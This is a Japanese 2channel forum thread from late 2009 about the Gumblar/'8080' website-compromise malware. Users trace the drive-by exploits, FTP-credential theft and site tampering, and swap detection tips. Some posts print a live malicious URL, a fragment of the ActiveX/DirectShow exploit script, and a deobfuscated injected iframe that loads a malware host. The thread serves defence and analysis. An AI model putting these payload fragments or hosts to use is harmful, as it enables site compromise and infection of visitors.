69名無しさん@お腹いっぱい。:2009/12/28(月) 02:11:43
>>65
踏んだら速攻でダウンロード実行される
ドライブバイダウンロードというやつか
適切なアップデートをしておけば問題ない
もちろんセキュリティソフトが停止させる場合もあるが
70名無しさん@お腹いっぱい。:2009/12/28(月) 02:12:18
>>68
「上がる」って、JREやFlash経由で落ちてくるから、ダウンロードポップアップはおろか、IEのキャッシュにも残らない可能性があるからな
念のため言っておくが。
71名無しさん@お腹いっぱい。:2009/12/28(月) 02:14:43
>>70
いや試したのはJAVAもFlashもインストールされてない環境だ
MSの脆弱性かな

もちろんJAVAやFlashの脆弱性を突かれた場合は同じような動作をするかどうかは分からない
72名無しさん@お腹いっぱい。:2009/12/28(月) 02:16:27
実行ファイルも残らないの?
セキュソフトの定義更新が間に合ってなかったら、もう感染確定の判断はできないのかな
バカでゴメン
73名無しさん@お腹いっぱい。:2009/12/28(月) 02:20:48
>>72
テストしたときは残った
ただテストでは最後まで実行させず途中で終了させた

最後にすべて削除するようなこともあるかも知れない
まあ分からないってことだ
74名無しさん@お腹いっぱい。:2009/12/28(月) 02:22:26
>>73
そっか・・・ありがとう
とりあえずPCの挙動が安定してるうちは様子見して、各種セキュソフトの対応待つよ
75名無しさん@お腹いっぱい。:2009/12/28(月) 02:27:02
難読化といてみると、ただJSを落としてるだけっぽいな。
他のJSをダウンロードしてる先が、ロシアってことか。

そいつがさらに脆弱性ついて、ドライブバイダウンロードするって事か。
76名無しさん@お腹いっぱい。:2009/12/28(月) 02:29:11
>>45
今Aviraで試したらwebguardが検出した。
URL "http://adsrevenue-net.king.com.newgrounds-com.themobilewindow.ru:8080/pics/win.jpg" のデータにアクセスする際に、
ウイルスまたは不要なプログラム 'EXP/DirektShow.A' [exploit] が検出されました。
77名無しさん@お腹いっぱい。:2009/12/28(月) 02:30:01
あ、ごめん
直リンしちまったじゃねえか

>>76
はウイルス
注意
78名無しさん@お腹いっぱい。:2009/12/28(月) 02:37:55
79名無しさん@お腹いっぱい。:2009/12/28(月) 02:43:33
pdfupd.exe って名前から判断して、またAdobeReaderの脆弱性か?。

たしかコレって、ゼロデイの可能性ありってやつじゃなかったか?
http://www.adobe.com/support/security/advisories/apsa09-07.html

これじゃねーだろうなぁ。
これだったら、Js切るか、AdobeReaderアンインスコしない限り、対策ないぞ。

80名無しさん@お腹いっぱい。:2009/12/28(月) 02:48:41
>>79
あんた、ちょっと遅れてる・・・・

新手の正規サイト改ざんでAdobe Readerのゼロデイ攻撃〜今すぐ対策を
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2106

Adobe Reader 及び Acrobat の未修正の脆弱性に関する注意喚起(JPCERT/CC)
ttps://www.jpcert.or.jp/at/2009/at090027.txt
81名無しさん@お腹いっぱい。:2009/12/28(月) 02:48:53
>>79
マイクロソフトのActiveX
MS09-032あたりじゃないかな
82名無しさん@お腹いっぱい。:2009/12/28(月) 02:53:23
>>80
ありゃ。やっぱゼロデイか。PDF切っとくか。
83名無しさん@お腹いっぱい。:2009/12/28(月) 02:57:49
>>82
pdfupd.exeは>>81氏が言うActiveXの脆弱性突くものかもしれないけど、ゼロデイ攻撃始まってるのも事実ってことで
84名無しさん@お腹いっぱい。:2009/12/28(月) 03:00:07
今回はマイクロソフトのActiveXの脆弱性を突かれてpdfupd.exeがダウンロード実行されたってこと
Adobe Readerがインストールされていれば違った攻撃もあるかも知れない
85名無しさん@お腹いっぱい。:2009/12/28(月) 03:12:40
>>78みる限り、各ベンダー全滅、かろうじてカスペが引っかかったりしなかったりで
後はGENOみたいにPC立ち上がらなかったりするような分かり易い症状もないってこと?
86名無しさん@お腹いっぱい。:2009/12/28(月) 03:16:04
GENO系の全てに黒画面にマウスカーソルの症状が出る訳じゃないんだけど
87名無しさん@お腹いっぱい。:2009/12/28(月) 03:16:17
上にもあるように
ノートンやAviraなどはファイルスキャンではなくwebサイトにアクセスすると検出する仕組みになってる
AviraフリーはWebGuardが無いから注意が必要だが
88名無しさん@お腹いっぱい。:2009/12/28(月) 03:19:08
>>78はpdfupd.exeの検出結果のみであって、どのファイル・コード・タイミング・振る舞いで検出するかもベンダーで違うだろうしなんとも言えないな
ヒューリスティックで捕まえる場合もあるだろうし

ただ
>分かり易い症状もないってこと?
これはYesって言っといた方が対策する人も増えるか?
8987:2009/12/28(月) 03:21:34
ごめん
AviraはWebGuardじゃなくても検出するかも知れない
検証はしていないので分からない
90名無しさん@お腹いっぱい。:2009/12/28(月) 03:24:39
>>76
WebGuardなくてもAviraで検出することを確認
91名無しさん@お腹いっぱい。:2009/12/28(月) 03:32:43
>>24
自己レス
avast!がスクリプトに対応

/*GNU GPL*/
26日 結果: 1/41
Avast 4.8.1351.0 2009.12.27 JS:Illredir-B
ttp://www.virustotal.com/jp/analisis/bbb1b07545f46b6310ef1d8508e31437531a89a58e0cf263590bc4bce8ae68b9-1261938262
92名無しさん@お腹いっぱい。:2009/12/28(月) 03:32:56
93名無しさん@お腹いっぱい。:2009/12/28(月) 03:45:55
>>91
avastは誤検出しまくってるようだが
そのせいではないの?
94名無しさん@お腹いっぱい。:2009/12/28(月) 04:08:43
JAVAを利用した攻撃の際は
win.jpgではなくJavaGame.jarがダウンロードされる
http://www.virustotal.com/jp/analisis/273460dd3c1cccd44da0e1f8e19e0cf506ad490f5624535cc789f65496e940f9-1261940810
9594:2009/12/28(月) 04:10:59
ちなみにノートンではダウンロードしようとするときに検出するが
virustotalで検出されない
96名無しさん@お腹いっぱい。:2009/12/28(月) 05:00:58
JAVAが無いときは
Adobe Readerも利用されるね
97名無しさん@お腹いっぱい。:2009/12/28(月) 06:39:35
http://beatarai●blog90.fc2●com/

avastのスレでも書かれていたけど、
このブログは大丈夫?
98名無しさん@お腹いっぱい。:2009/12/28(月) 07:20:25
win.jpg はDirectShowのMS Video ActiveX Control(CVE-2008-0015)の脆弱性攻撃。
JavaGame.jar はJRE(CVE-2008-5353)の脆弱性攻撃。
pdfupd.exe はAdobe Readerの脆弱性攻撃用の ChangeLog.pdf が落として来て実行するトロイの木馬本体。
他のルートでも最終的には同じものが落ちて来て、このトロイの木馬が Bredolab とか HDrop
とかで検出されるはず(でも今は全然検出してくれなぁ)のダウンローダです。

ダウンローダが、その後何をダウンロードしてくるかは、その時の攻撃者の気分次第。
攻撃側が用意したものを何でもインストールできちゃうわけね。

実行してみれば、その時点で落ちて来るものは分かるんだろうけど。
99名無しさん@お腹いっぱい。:2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/〜というコードが埋め込まれてたっぽい

サイトを開くと
このファイルの実行を許可しますか?というウインドウが出てきて(VISTA)
「キャンセル」を押しても再度同じウインドウが表示
何度押しても同じでそのうち画面が固まる

再起動して、通常起動でウインドウを開始すると
マイクロソフトセキュリティーエッセンシャルが反応
詳しい表示は憶えてないけど、表示されたファイルの削除を選択(履歴見ても何も残っておらず詳しいことが不明)

PCはそのまま使えていたので安心していたら、
出先で自分のサイトを携帯でみたらエラー500が表示されるのに気づく

家に帰り、サーバーの履歴を見ると感染源のサイトを見た直後から複数のIPでログインされてた。
そしてパソコンの電源を切って外出した時間あたりでログインも止まっていた。

もう1台のパソコンからFTPのパスワードなど変更
サーバー上のファイルも消去
ファイルを見るとindex.html index.php 〜.jsファイルがほぼすべて最下部に/*GNU GPL*/〜が埋め込まれていた。

問題のPCにカスペの体験版を入れて(オンラインスキャンが停止中なので)みたら
スタートアップにsiszyd32.exeが検出されたので削除。

今ここ

もうこれ再インストールするしかないんでしょうか。
100名無しさん@お腹いっぱい。:2009/12/28(月) 08:42:16
追記

説明がわかりにくいね
自分のサイトはレンタルサーバー上にあり
FTPで更新しています。
101名無しさん@お腹いっぱい。:2009/12/28(月) 08:47:32
>>99
感染した状態でサイト更新した?
それともFTPとか使ってなく自サイトにアクセスした覚えがないのにパス抜かれて改ざんされたの?
102名無しさん@お腹いっぱい。:2009/12/28(月) 08:58:22
>>101

レンタルサーバーは2つ借りていて
片方はWORDPRESSの管理画面からログインはした。

でももう一方は数カ月まったく使っていないサーバーで
念のためにもう一台のパソコンから調べたらしっかりファイルが書き換えられてた。
どちらもFTPソフトにパスワードは登録していた。
103名無しさん@お腹いっぱい。:2009/12/28(月) 09:28:45
サイト閉じてとっとと再インスコしろよ…
104名無しさん@お腹いっぱい。:2009/12/28(月) 09:41:40
>>93
webシールドで止まるようになった。
105名無しさん@お腹いっぱい。:2009/12/28(月) 11:41:07
https://twitter.com/digimaga

いや、アンタが最初にすべきことは、自分のサイトを閉じることだろ。。
106名無しさん@お腹いっぱい。:2009/12/28(月) 12:38:09
どもども、99です
サイトは閉めてサーバー上のファイルは全部消してるよ

今、PCの再インストール中
いらんソフトとか捨てるいいきっかけになったよ、スッキリ
107名無しさん@お腹いっぱい。:2009/12/28(月) 14:42:08
>>106
FTPクライアントは何使ってるの?
パスワード保護に強いのはないかな?
FileZilla使ってるけど全く暗号化してないしこれ最低だよな
108名無しさん@お腹いっぱい。:2009/12/28(月) 15:10:25
これってオンラインゲームのIDもとられるの?
109名無しさん@お腹いっぱい。:2009/12/28(月) 15:38:16
そんなチンケな物はとらんよ、たぶん
110名無しさん@お腹いっぱい。:2009/12/28(月) 16:35:05
>>>107

FFFTP使ってる

サーバーのログイン履歴詳しく見てみたけど
やっぱりパソコンの電源切った時からログインがなくなってる
感染から外出まで1時間、外出から帰宅まで4時間
感染

感染に気付かずPC電源切り外出

帰宅

電源切るまでは、ほぼ10秒単位でランダムなIPからログインあり。
その後帰宅するまでまったくログインなし。

あと、/*GNU GPL*/〜というコードの最後に規則的な英数字が0〜300個ずつ改行されてくっ付いてた。

一応参考までに報告
111名無しさん@お腹いっぱい。:2009/12/28(月) 22:49:21
「思い立ったら書く日記」と「べつになんでもないこと」はググって必ずチェックすることをオススメする。
112名無しさん@お腹いっぱい。:2009/12/28(月) 22:52:00
遠慮しとく
113名無しさん@お腹いっぱい。:2009/12/28(月) 22:58:43
>>110
参考になった。情報サンクス。
114名無しさん@お腹いっぱい。:2009/12/29(火) 08:46:20
感染確認に
適当なフリーページ登録してFTPでアップロードしてみりゃいいのかな?
115名無しさん@お腹いっぱい。:2009/12/29(火) 14:51:00
某ブログで見たが8080系はWinampの脆弱性も突くのか?
116名無しさん@お腹いっぱい。:2009/12/29(火) 15:40:07
Winampの脆弱性ってのもよくわからないんだよな。
俺は必要十分余計な機能は欲しくないという理由でいまだに2.81を使っているんだが、現行とは
系統が違うこのあたりの古いバージョンにも同様の危険性があるのかねえ?
117名無しさん@お腹いっぱい。:2009/12/29(火) 16:02:10
Winampは何度か脆弱性が話題になってるよな
出来れば最新を使うか使わない方が良い
118116:2009/12/29(火) 18:08:06
WAN接続はCDDBからの情報取得だけでファイルを直接再生することは皆無なんだけどね。
最新版への更新も検討してみるかな。
119名無しさん@お腹いっぱい。:2009/12/29(火) 23:28:07
>>115

この辺のことか?
| var ovCEkVSTS = document.createElement('object');
| document.body.appendChild(ovCEkVSTS);
| ovCEkVSTS.id = 'IWinAmpActiveX';
| ovCEkVSTS.width = '5';
| ovCEkVSTS.height = '5';
| ovCEkVSTS.data = './pics/win.jpg';
| ovCEkVSTS.classid = 'clsid:0955AC62-BF2E-4CBA-A2B9-A63F772D46CF';
| var tIx8bqnvuS = *** ShellCode ***

IWinAmpActiveXって名前付けてるけど、呼び出してるclassidはDirectShowだよ。
そんで、MSVideoの脆弱性(CVE-2008-0015)搭載のwin.jpgを食わせてShellCode実行!

120名無しさん@お腹いっぱい。:2009/12/29(火) 23:40:42
違うだろ
121名無しさん@お腹いっぱい。:2009/12/30(水) 12:04:12
122名無しさん@お腹いっぱい。:2009/12/30(水) 13:24:05
このウィルスって各ベンダーのスキャンで発見できるの?
FTPにファイル上げるときに、同じく登録してあった別パスぶっこ抜かれて全部改竄されたって話だけど
逆にFTPにパス保存してあっても、実際に起動して更新作業しない限り
サイト改竄は免れんの?
それとも感染直後に(感染後FTP未使用でも)勝手にパス抜きされて接続、改竄なの?
123名無しさん@お腹いっぱい。:2009/12/30(水) 15:22:39
8080用チェッカー作った
124名無しさん@お腹いっぱい。:2009/12/30(水) 16:30:26
Gumblarは新コードのテスト中?
<script src=http://「中略」.php?op=java ></script><body>
125名無しさん@お腹いっぱい。:2009/12/30(水) 17:47:35
俺もやれたんだけど
FFFTPに登録してあるサイトが全部がやられた
接続してないサイトもやられてたから
どれか1つ接続するとリストにある奴が全部やられたってことだな

つまりこれってFFFTPがハッキングされたことになるのか?
他の感染者がどのFTPソフト使ってるのかわかないからなんともいえないが

というか感染してからまだウィルスだと気づいてないとき自分のサイト見たら
AVGが反応したんだが、つまりウェブ上からは感染は防げてたってことだから
最初の感染はローカルってことになる

pdfとか見てたからやっぱり感染元はこれっぽいな
126名無しさん@お腹いっぱい。:2009/12/30(水) 17:58:49
感染したときに設定読み取るのかもよ
127名無しさん@お腹いっぱい。:2009/12/30(水) 19:27:20
>>121
うっ!ほんとだ。
2年ぐらい前のAOL Winampの脆弱性ぽいっすね。
わざわざインストールさせようとしているcabを落としてみたら
2005年4月版でやんの。何でAOLはこんな古いの置いてんだ。
128名無しさん@お腹いっぱい。:2009/12/30(水) 20:02:06
>>99見てると、UAC有効にしてても効果がないってことか
129 ◆774......E :2009/12/30(水) 22:17:20
新型8080系用のチェッカー出来たので公開してみるテスト
http://www12.atpages.jp/trick1/
130名無しさん@お腹いっぱい。:2009/12/30(水) 23:59:28
俺はどこも信用できないね
131名無しさん@お腹いっぱい。:2009/12/31(木) 00:57:04
>>129
せめて文字コードぐらい指定してくれ
IEで開いたら文字化けしてびびったw
ウィルスかた思ったぜw
132名無しさん@お腹いっぱい。:2009/12/31(木) 01:49:39
もうネットにつながないから
この脅威が去ったら電話くれ!
133名無しさん@お腹いっぱい。:2009/12/31(木) 10:25:50
結局、感染したらFTPで鯖にファイル上げるしか確かめようは無いのか?
感染した奴は皆このルートで判明?
134 ◆774......E :2009/12/31(木) 10:40:00
>>131
ごめんなさい><文字コード指定しました
135名無しさん@お腹いっぱい。:2009/12/31(木) 12:05:30
ここに張ってるURLは危険そうですな
136名無しさん@お腹いっぱい。:2009/12/31(木) 12:17:02
/*GNU GPL*/踏んだ可能性があるんだけど
spoolsv.exeってのが新たに出来てる気がする
これ関係ある?
137名無しさん@お腹いっぱい。:2009/12/31(木) 12:33:10
>>136
spoolsv.exeはプリントスプーラだよ。
プリントジョブの仕掛かりが溜まってない?
138名無しさん@お腹いっぱい。:2009/12/31(木) 13:24:17
>>137
いや、それが少なくともここ1年はプリンタにつないでないPC
なのにマカのファイアーウォールの設定でもいつの間にか送受信完全に許可扱いになってる
そもそもタスクマネジャでメモリ使用上位にそんなのは今までいなかった気がする
で、spoolsv.exeでググったら、トロイの偽装の可能性と出てきたんで

でもフルスキャンしても何もでてこないし
CPU使用率は安定してるし
少なくとも表面上はPCがどこかにアクセスしっぱなし、と言う風には見えないし
もうどうすりゃいいんだか
139名無しさん@お腹いっぱい。:2009/12/31(木) 13:38:46
>>131
ついでに、Gumblarの簡易チェックも組み込めないかな?

</head><script src=http://*.php ></script><body
これがあったら黒判定って事で。
140名無しさん@お腹いっぱい。:2009/12/31(木) 13:41:12
>>138
サービスを殺しても生きてたら
変なのが寄生してると思われ。
141名無しさん@お腹いっぱい。:2009/12/31(木) 14:13:43
>>138
Process ExplorerかSlightTaskManager(これはXPまでらしい)でspoolsv.exeのパス(フォルダ)を
確認して、spoolsv.exeのファイルのプロパティで作成日時、更新日時、等がおかしくないか確認。
その後、spoolsv.exeをvirustotalでチェックする、くらいしか思いつかない。
142138:2009/12/31(木) 16:06:59
>>140-141
Process Explorer等入れてないんで(この状況下でネットつなげないし)
マカのアクセス許可設定にあったパス(system32以下)でプロパティチェック
作成日時、更新日時は随分前のまま変わらず(少なくとも踏んだ可能性のある日じゃない)で56.5kb
メモリの使用量は38.956
ネットきってるんでvirustotalに確認にいけてないが、なんとなく白っぽい
気がするんだがどうか

サイト管理者以外で、/*GNU GPL*/感染確認するには、本当どうしたらいいんだろうか

143名無しさん@お腹いっぱい。:2009/12/31(木) 16:19:01
spoolsv.exeはOSにデフォルトで入ってるだろ
144名無しさん@お腹いっぱい。:2009/12/31(木) 17:24:32
>>143
もちろんそうなんだが
どんだけスキャンかけても何にも引っかからないんで、
とりあえず普段と(多分)違う挙動のものを虱潰しにしてるんだよ
spoolsv.exeがトロイ偽装のケースもあるって話しだし
/*GNU GPL*/感染で、実際にどんな症状が出るかってのが全く聞こえてこないんだが
サイト改竄以外に何があるんだ?

つうかPC調子悪いときに携帯規制とかキッツイ

145 ◆774......E :2009/12/31(木) 18:27:33
>>139
今回のバージョンアップの際に簡易的にチェックするようにしました。
もしかしたら誤検出があるかもしれません

>>144
別のウイルスをダウンロードしてきます。
146名無しさん@お腹いっぱい。:2009/12/31(木) 18:28:55
どこの馬の骨だよ
147名無しさん@お腹いっぱい。:2009/12/31(木) 20:03:18
>別のウイルスをダウンロードしてきます。

今回感染後も普通にPCつかえてて、自サイト改竄が発覚して漸く感染に気づくとか
そんなのばっかりな気がするけど
/*GNU GPL*/感染のケースで他のウィルス呼び込んだ事例あがってんの?
148名無しさん@お腹いっぱい。:2009/12/31(木) 21:21:18
紅白FLASH合戦スレで/*GNU GPL*/報告出たけどスルーされてたな
何人か開いちゃったんじゃないのあれ
149名無しさん@お腹いっぱい。:2009/12/31(木) 22:37:48
なんかあっちこっちのスレで/*GNU GPL*/のURL貼られてる割に
いまいち騒ぎになってないよな
JRやホンダまで感染したのに、そこを踏んで自分が感染したっていう犠牲者の声が少ない
GENOのときはPC再起動不可っていう分かりやすい(といか致命的)エラーが出たから
皆感染が分かったけど
今回は自覚症状無いまま、感染後そのままPCで飼ってるやつ多い気がするんだが
150名無しさん@お腹いっぱい。:2009/12/31(木) 22:45:08
アドビ関係全部アンインスコして専ブラで2chだけを見るネット生活を八ヶ月続けてるが
それでも不安が拭えない
151名無しさん@お腹いっぱい。:2009/12/31(木) 22:51:56
オミで/*GNU GPL*/を含むscriptタグを殺しちゃえばいいんじゃね
152名無しさん@お腹いっぱい。:2009/12/31(木) 23:10:21
>>149
Gumblarの時にはコマンドから起動出来る出来ないや
ファイルのサイズでで見分けられたりしたけど
今回はどうやって見分けるかのかまだよく分からないしなあ・・・
各種アンチウイルスソフトは感染しているときちんと動作するのかとかも。

違法ファイルのダウンロードの法律よりも、故意にウイルスばらまいたやつに
罰則強化とかしてほしい。
153名無しさん@お腹いっぱい。:2009/12/31(木) 23:26:33
今回のは感染後、各ベンダーのサイトが開けなくなったとか
MSアップデートが出来なくなった、とかそういう話も聞かないよな
今のところは「FTPでパス抜きされたあと」から、10秒単位で不正アクセスっていう
コレくらいしか目立った特徴は出てない気が
154名無しさん@お腹いっぱい。:2010/01/01(金) 03:48:56
年明け早々、会社のWEBページが改ざんされたw

形態に電話があり、今から出勤、最悪。

Gumblar再開とかかいてあるし、何されてるのか。

正月休みもパーだな。
155名無しさん@お腹いっぱい。:2010/01/01(金) 03:51:48
脆弱性対策をしててもプラウザのJavaScriptがオンなら、8080サイトからマルウェアが自動的に
ダウンロードされて、発動はしなくてもPC内に残るのかな?もしそうなら、それはそれで気持ち悪いな
156名無しさん@お腹いっぱい。:2010/01/01(金) 04:55:50
>>154
ドンマイw
157名無しさん@お腹いっぱい。:2010/01/01(金) 04:58:13
>>155
いや
158名無しさん@お腹いっぱい。:2010/01/01(金) 05:31:17
Adblock Plusの存在を忘れてた・・orz

・8080
*:8080*$script,link,object

・Gumblar
*.php$script,link,object
159名無しさん@お腹いっぱい。:2010/01/01(金) 17:36:13
ttp://pc11.2ch.net/test/read.cgi/sec/1262054865/392-405 から。
 → ttp://www●stardustpictures●co●jp/katagirihairi4/
160名無しさん@お腹いっぱい。:2010/01/01(金) 17:56:02
カスペルスキーのオンラインウイルススキャンは現在は停止中なのかな?
161age:2010/01/01(金) 18:02:21
某所から転載
--ここから--
www●ideele●nl/a-home.htmに埋め込まれたコードの難読化を解除すると
<iframe width=1 height=1 border=0 frameborder=0 src='http://sodanthu●com/in6.php'></iframe>
--ここまで--

↓同一のコードが仕込まれてる↓
tp://rcmorningstar●com/cp/scripts/formmail-doc/example_src●html

因みに>>129のチェッカーはスルーする。
162名無しさん@お腹いっぱい。:2010/01/01(金) 18:37:19
チェッカーだめじゃんw
163名無しさん@お腹いっぱい。:2010/01/01(金) 18:43:01
>>161
カスぺは反応するが
164名無しさん@お腹いっぱい。:2010/01/01(金) 19:12:55
>>159
30日くらいにモームス板(?)に
"超一流芸能事務所スターダストのホームページにトロイの木馬"
ってスレが立ってたようだけど、それかな?
スレ自体は直ぐに落ちた様だけど。

avast!だと、JS:Illredir-B [Trj] で
カスペルスキーだと Trojan-Clicker.JS.Iframe.db なのかな?

先日、avast!が JS:Illredir-B [Trj] をブロックしてくれたのかも知れないけど
個人ブログとかにも広がってるかも。
165名無しさん@お腹いっぱい。:2010/01/01(金) 19:12:58
>>110
乙です。

感染すると自動的に他のPCから他のPCからかきかえにくるのかな。
ボットか何かかな。
166名無しさん@お腹いっぱい。:2010/01/01(金) 19:20:43
カスペのオンラインでもいまだと検出されるの?

>>160ニフの方も止まってるの?
167名無しさん@お腹いっぱい。:2010/01/01(金) 19:24:09
>>166
ニフティの方は分からないけど、公式(日本語)サイトの方は
年末年始って事なのか停止中っぽいけど。
168161:2010/01/01(金) 19:48:25
"<script>function" "return String.fromCharCode(c);" "getElementById("
高確率でヒットするので、これで捜索中・・・
169名無しさん@お腹いっぱい。:2010/01/01(金) 19:56:23
>>167
ニフの方はいけたはずだけど、中身同じじゃねえの?
170名無しさん@お腹いっぱい。:2010/01/01(金) 21:16:49
よくよく読んでみたら、上で報告の上がってる>>99ってFFTTP起動させるまえ、
感染サイト踏んだ直後から自サイトにアクセスされて書き換えされてたって事?
となると、踏んでアウトなら、
その瞬間にFTP起動有無にかかわり無く速攻保存してある管理パス抜かれて
改竄されるって事か

171名無しさん@お腹いっぱい。:2010/01/01(金) 21:24:13
FFFTPだった。まあいいや
172名無しさん@お腹いっぱい。:2010/01/01(金) 22:10:22
>>161
検索してみた

悪意のあるリンク先URLのリスト(マルウェアドメイン一覧)
ttp://www.itis.tw/badlink
↑ここにリストがありますね
ホストするIP:127.0.0.1

ttp://www.itis.tw/badlink←誰が作ったの?
173 ◆774......E :2010/01/01(金) 23:06:02
>>161
反応するようにしました。
174名無しさん@お腹いっぱい。:2010/01/02(土) 05:59:43
>>172
台湾人だろ
175名無しさん@お腹いっぱい。:2010/01/02(土) 07:38:11
GNU GPLのやつなんてファイアウォールで
アウトバウンド制御してるだけでも防げそうだけどな
感染した人は入れてないだろ
176名無しさん@お腹いっぱい。:2010/01/02(土) 08:22:58
>>174
知らねえ奴は黙ってろ
177名無しさん@お腹いっぱい。:2010/01/02(土) 09:40:25
>>175
そう言えば
なぜかファイアウォールのアウトバウンド制御はいらないとか主張するやつが最近増えてたな
それだけでも防げることなのに
178名無しさん@お腹いっぱい。:2010/01/02(土) 10:19:30
シナの留学生が工作してるんだろw
179名無しさん@お腹いっぱい。:2010/01/02(土) 10:27:39
中国のIP防ぐだけでもかなり安全になるよね
180名無しさん@お腹いっぱい。:2010/01/02(土) 10:46:20
"fff=op.split(" "fff.op.replace(" の検索結果 約 14,200件

>>172
サイトのタイトル
惡意連結網址列表 (Malware Domain List) | 資安之眼
実際に表示されるサイトのURL
ttp://www.itis.tw/badlink
IPアドレス
60.248.88.10
逆引きホスト名
ns1.misway.com
181名無しさん@お腹いっぱい。:2010/01/02(土) 12:57:42
>>176
知らねえ奴は黙ってろ
182名無しさん@お腹いっぱい。:2010/01/02(土) 20:59:02
あーわかった
FFFTPのインポート/エクスポートってレジストリファイルを読み込み/出力してる
だからGumblarはレジストリからFTPでアクセスする(改ざんする)サイトをみてるわ

FTPソフトってどれもレジストリいじってるのか?

てっきり普通のファイルに保存してるのかと思ってたぜ
183名無しさん@お腹いっぱい。:2010/01/02(土) 22:07:17
FFFTPはini保存もできるし、パス抜きは普通にポート見てるだけだろ。
FTPは平文で、だからSFTP使えって話になってるんだよ。
184名無しさん@お腹いっぱい。:2010/01/02(土) 22:24:42
>>183
知らねえ奴は黙ってろ
185名無しさん@お腹いっぱい。:2010/01/02(土) 22:56:18
>>183
>>125の状況みるとポートだけ見てるだけではないと思うが
レジストリにFTPのIDとパスを書き込んでるんから
そこで見破られたんじゃないかという話
SFTP使ってもレジストリいじるソフトなら意味んじゃないか

まあ感染してない奴が憶測で言ってもしょうがない

186名無しさん@お腹いっぱい。:2010/01/02(土) 23:35:36
Unmask Parasites. Blog.がものすごく詳しいな。
187名無しさん@お腹いっぱい。:2010/01/03(日) 00:33:44
うわまたきてるww
放置してたんでパス変えるの忘れてたサイトみたらやらてたw
時間は2010/01/02 23:27

やっぱ感染するとFTPのIDとパス盗まれてるわ
FTP接続しなくても改ざんされてるww
188名無しさん@お腹いっぱい。:2010/01/03(日) 00:52:23
「F-Secure Exploit Shield 0.70 build 19」
ttp://www.f-secure.com/en_EMEA/downloads/beta-programs/home-office/exploit-shield/index.html
解説サイト→ttp://all-freesoft.net/soft/vulnerability/f-secureexploitshield/f-secureexploitshield.html

XP SP3でavast!と共存させて人柱してるが、問題無く稼動中。
189名無しさん@お腹いっぱい。:2010/01/03(日) 01:04:44
F-Secureはこれ検出すんの?
190名無しさん@お腹いっぱい。:2010/01/03(日) 01:11:48
じゃあ、ウィルスサイト踏んでも、FTPインスコ済みID記憶済み、FTP未接続で
サイト感染が無ければ白ってことか?
191名無しさん@お腹いっぱい。:2010/01/03(日) 01:21:48
>>189
試したところ駄目っぽい感じ
192名無しさん@お腹いっぱい。:2010/01/03(日) 01:28:54
>>186のブログの翻訳を読んでみたが
今発病してるサイトの運営者はだいぶ前から感染していて
すでにFTPのIDとパスは盗まれてるようだ
だからウィルスまいた奴の好きな時間にサイトを改ざんできる
防ぐにはFTPのパスを変えるしかなさそうだ

だいたいこんなかんじじゃね
GNU GPL踏むとFTPのIDとパスがあれば盗まれる
サイト運営してない人はたぶん無害かも

改ざんの告知にウィルススキャンだけでなく
サイト運営者はFTPパスの変更も加えたほうがいいかもな

JRの時は2週間ぐらい放置してたんだろ
FTPパス盗まれた運営者まだたくさんいると思うぜ
193名無しさん@お腹いっぱい。:2010/01/03(日) 01:30:31
何を今更
194名無しさん@お腹いっぱい。:2010/01/03(日) 01:33:31
>>186でもの凄く詳しいな、って書いてるけど内容はその程度なのか
195名無しさん@お腹いっぱい。:2010/01/03(日) 01:39:35
トークン認証でよくね?
196188:2010/01/03(日) 01:42:57
よ〜く見たら、ですね・・・
防いでくれてるのは
CVE-2006-3730
CVE-2007-0038
CVE-2006-4868
CVE-2006-4301
CVE-2008-3008
CVE-2006-0005
CVE-2008-4844
CVE-2009-0901
CVE-2009-0927

「CVE-2009-4324」入って無いじゃん・・・ (´・ω・`)

gred AVアクセラレータの方が良いかもしれん
197名無しさん@お腹いっぱい。:2010/01/03(日) 01:46:57
gredなんか論外だが
aviraやavastやらでも対応は出来る
ファイアウォール程度入れとけ
198名無しさん@お腹いっぱい。:2010/01/03(日) 01:56:00
FWで防げるのに広まってるの?
199名無しさん@お腹いっぱい。:2010/01/03(日) 02:01:58
ファイアウォール入れとけばおかしな通信があるからすぐ分かるね
実際にこの通信がパスワードを流してるかどうかは不明だけど
間違いなくおかしいと気づく
200名無しさん@お腹いっぱい。:2010/01/03(日) 02:11:10
多くの人が無防備ってことだろうな
MSEなんか使ってファイアウォールはWin標準なんて人も多かったんじゃないのかな
201名無しさん@お腹いっぱい。:2010/01/03(日) 02:26:14
実際のところサイト運営者以外無害なのか

おまえらサイト運営してるの?

>>187以外にいる?
202名無しさん@お腹いっぱい。:2010/01/03(日) 02:34:14
報告にもあるとおり
Windows起動時のスタートアップに実行ファイルを登録する
その実行ファイルが通信する
その他システムの改変は今のところ俺は確認してない
しかしどんな攻撃でも可能だから注意は必要
203188/196:2010/01/03(日) 03:02:59
>>197
PC Tools(笑)を入れてるよ
v6.0.0.86
204名無しさん@お腹いっぱい。:2010/01/03(日) 04:34:02
Firewallのログを見ておかしな通信を見つけたところでもう遅い
その通信を止めてくれてこそ役立ったってことでしょ
だいたい警告もないのにFWのログなんて見ます?
実際には大手のサイトのWEB制作会社がFWも入れてないとは
考えられないので、FWは突破されてしまっているんでしょうね
205名無しさん@お腹いっぱい。:2010/01/03(日) 04:36:13
最初の通信で問い合わせがあるだろ
まあ使ってるソフトにもよるがそう言うソフトを使えってこと
206名無しさん@お腹いっぱい。:2010/01/03(日) 04:39:40
>>204
知らねえ奴は黙ってろ
君にはこれが適切
207名無しさん@お腹いっぱい。:2010/01/03(日) 04:40:09
>>205
そういうのをセキュリティソフトに対する過信って言うんだよwww
208名無しさん@お腹いっぱい。:2010/01/03(日) 04:41:26
試せば分かること
知らねえ奴は黙ってろ
209名無しさん@お腹いっぱい。:2010/01/03(日) 04:43:19
>>207
書き込み内容からして無知なのは明らかだが
なんでそんな自信ありそうな語り口なんだ
210名無しさん@お腹いっぱい。:2010/01/03(日) 04:45:16
>>208
じゃあ、何を試してどういう結果になったか全部書き出せよ
FWを入れていれば大丈夫みたいないい加減なこと書き込まないでさぁあ
211名無しさん@お腹いっぱい。:2010/01/03(日) 04:47:40
>>210
このスレに全部書いてあるんじゃないか
このスレは色んな人がいるから仕方ないが
まともなこと言っても無知なやつが偉そうな口調で否定するからこまる
212名無しさん@お腹いっぱい。:2010/01/03(日) 04:51:38
>>211
だから、具体的にどこのFWなら、ちゃんと警告を出して
どこのものなら、簡単に突破しているって出してみろよ
213名無しさん@お腹いっぱい。:2010/01/03(日) 04:55:18
初心者スレいけよ
